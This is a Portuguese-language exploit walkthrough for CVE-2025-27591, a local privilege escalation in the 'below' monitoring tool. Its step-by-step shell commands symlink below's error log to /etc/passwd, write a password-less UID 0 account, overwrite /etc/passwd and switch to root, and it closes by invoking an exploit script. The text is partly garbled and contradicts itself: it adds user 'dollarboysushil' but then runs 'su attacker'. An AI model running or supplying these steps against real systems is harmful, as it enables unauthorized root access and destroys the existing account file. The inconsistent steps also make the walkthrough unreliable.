
CVE-2025-27591 é uma vulnerabilidade conhecida de escalada de privilégios no serviço Below (versão < v0.9.0)
belowEste é um exploit simples para a CVE-2025-27591, uma vulnerabilidade de escalação de privilégio local na ferramenta de monitoramento Linux below. A vulnerabilidade afeta versões anteriores à v0.9.0 e decorre de atribuições incorretas de permissão no sistema. O problema foi descoberto em janeiro de 2025 e divulgado publicamente em 12 de março de 2025 (SecurityOnline, OpenWall). Quando o below é executado com sudo, ele pode registrar erros em um diretório gravável mundialmente (/var/log/below), permitindo que atacantes criem um symlink de um arquivo de log para alvos sensíveis como /etc/passwd.
Ao explorar isso, um usuário não privilegiado com acesso sudo ao below pode escalar privilégios para root.
belowbelow record/var/log/below/error_root.log/var/log/below é gravável mundialmentesudo /usr/bin/below record sem senha✅ Passo 1: Verificar diretório de log gravável mundialmente Você deve ver:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ Passo 2: Remover qualquer error_root.log existente
rm -f /var/log/below/error_root.log
✅ Passo 3: Criar um symlink para /etc/passwd
ln -s /etc/passwd /var/log/below/error_root.log
depois verifique usando
ls -la /var/log/below/error_root.log
# deve mostrar: error_root.log -> /etc/passwd

✅ Passo 4: Criar um arquivo de payload Isso adicionará um novo usuário root chamado attacker sem senha:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
estrutura do arquivo
username:password:UID:GID:comment(home/full name):home_directory:shell
o ponto chave aqui é UID e GID
estamos definindo UID e GID como 0, tornando o usuário um usuário root e o Group ID = grupo root

✅ Passo 5: Acionar a escrita de log como root Este é o núcleo do exploit.
sudo /usr/bin/below record
Espera-se que este comando falhe ou expire — mas ele tentará escrever logs de erro em /var/log/below/error_root.log, que na verdade é /etc/passwd. 💡 Em alguns casos, apenas isso pode corromper /etc/passwd — então o sobrescrevemos completamente a seguir.
✅ Passo 6: Sobrescrever /etc/passwd via symlink
cp /tmp/payload /var/log/below/error_root.log

✅ Passo 7: Torne-se root
su attacker
Você será jogado em um shell root, sem necessidade de senha.

python3 dbs_exploit.py
